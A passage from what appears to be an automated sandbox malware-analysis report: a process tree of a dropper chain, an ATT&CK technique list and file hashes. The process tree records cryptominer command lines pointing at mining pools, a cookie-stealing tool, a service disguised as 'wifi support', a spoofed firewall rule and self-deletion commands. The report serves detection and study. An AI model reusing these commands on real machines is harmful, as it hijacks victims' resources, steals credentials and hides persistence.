                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lme2fc1y.tu3\GcleanerWW.exe /mixone & exit
                                                                                                              6⤵
                                                                                                                PID:4256
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ug0rjm3z.ie4\inst.exe & exit
                                                                                                                6⤵
                                                                                                                  PID:5336
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ug0rjm3z.ie4\inst.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ug0rjm3z.ie4\inst.exe
                                                                                                                    7⤵
                                                                                                                      PID:6360
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r440tryq.ocx\c7ae36fa.exe & exit
                                                                                                                    6⤵
                                                                                                                      PID:6188
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\r440tryq.ocx\c7ae36fa.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\r440tryq.ocx\c7ae36fa.exe
                                                                                                                        7⤵
                                                                                                                          PID:6568
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies system certificate store
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4980
                                                                                                                • C:\Users\Admin\AppData\Roaming\5CEB.tmp.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\5CEB.tmp.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4492
                                                                                                                  • C:\Users\Admin\AppData\Roaming\5CEB.tmp.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\5CEB.tmp.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5368
                                                                                                                • C:\Users\Admin\AppData\Roaming\5FAB.tmp.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\5FAB.tmp.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:732
                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w31431@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                    4⤵
                                                                                                                      PID:2440
                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w31811 --cpu-max-threads-hint 50 -r 9999
                                                                                                                      4⤵
                                                                                                                        PID:5236
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                      3⤵
                                                                                                                        PID:6104
                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                          ping 127.0.0.1
                                                                                                                          4⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4004
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                      2⤵
                                                                                                                        PID:5864
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                        2⤵
                                                                                                                          PID:6336
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            3⤵
                                                                                                                              PID:5600
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              3⤵
                                                                                                                                PID:6224
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                            1⤵
                                                                                                                              PID:1944
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                              1⤵
                                                                                                                                PID:1256
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                1⤵
                                                                                                                                  PID:1216
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                  1⤵
                                                                                                                                    PID:936
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:284
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:4000
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:3092
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:4292
                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      PID:4132
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:772
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:5100
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:5972
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:5224
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:5232
                                                                                                                                          • C:\Windows\system32\werfault.exe
                                                                                                                                            werfault.exe /h /shared Global\d7d05f582da6485ba033ee2a8f488bb0 /t 0 /p 5232
                                                                                                                                            1⤵
                                                                                                                                              PID:5460
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E82E.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E82E.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:1896
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EAEE.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\EAEE.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:6284
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FD3F.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\FD3F.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5416
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 852
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6500
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 896
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6064
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 924
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6676
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 1064
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5044
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 1124
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6400
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 1064
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5264
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 1136
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6860
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 1212
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4636
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\36B.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\36B.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3780
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\36B.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5356
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                            3⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:6708
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\34B.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\34B.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5732
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1399.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1399.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6284
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rqtnqrsk\
                                                                                                                                                              2⤵
                                                                                                                                                                PID:6452
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ccdojkiq.exe" C:\Windows\SysWOW64\rqtnqrsk\
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5252
                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                  "C:\Windows\System32\sc.exe" create rqtnqrsk binPath= "C:\Windows\SysWOW64\rqtnqrsk\ccdojkiq.exe /d\"C:\Users\Admin\AppData\Local\Temp\1399.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4984
                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                    "C:\Windows\System32\sc.exe" description rqtnqrsk "wifi internet conection"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:6152
                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                      "C:\Windows\System32\sc.exe" start rqtnqrsk
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4108
                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5396
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1511.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1511.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5000
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4916
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2667.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2667.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:7136
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4296
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4816
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2584
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6448
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6016
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2B1B.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2B1B.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2608
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\31F2.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\31F2.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6600
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3BC7.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3BC7.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2688
                                                                                                                                                                                            • C:\Windows\SysWOW64\rqtnqrsk\ccdojkiq.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\rqtnqrsk\ccdojkiq.exe /d"C:\Users\Admin\AppData\Local\Temp\1399.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6492
                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                  svchost.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1656
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5367.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5367.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5412
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5B76.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5B76.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4976
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\654B.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\654B.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:6032

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        New Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1050

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1197

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        New Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1050

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1197

                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1130

                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1081

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1518

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1018

                                                                                                                                                                                                        Collection

                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1005

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                        • C:\Program Files\Windows Media Player\OIVQCPPWWN\ultramediaburner.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                        • C:\Program Files\Windows Media Player\OIVQCPPWWN\ultramediaburner.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                        • C:\Program Files\install.dat
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          806c3221a013fec9530762750556c332

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                        • C:\Program Files\install.dat
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                                                                                        • C:\Program Files\install.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                        • C:\Program Files\install.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                        • C:\Program Files\libEGL.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          cc0f81a657d6887e246f49151e60123d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                                                                                        • C:\ProgramData\5829498.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                                                                                        • C:\ProgramData\5829498.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                                                                                        • C:\ProgramData\928377.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                                                                                        • C:\ProgramData\928377.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                                                                          SHA256

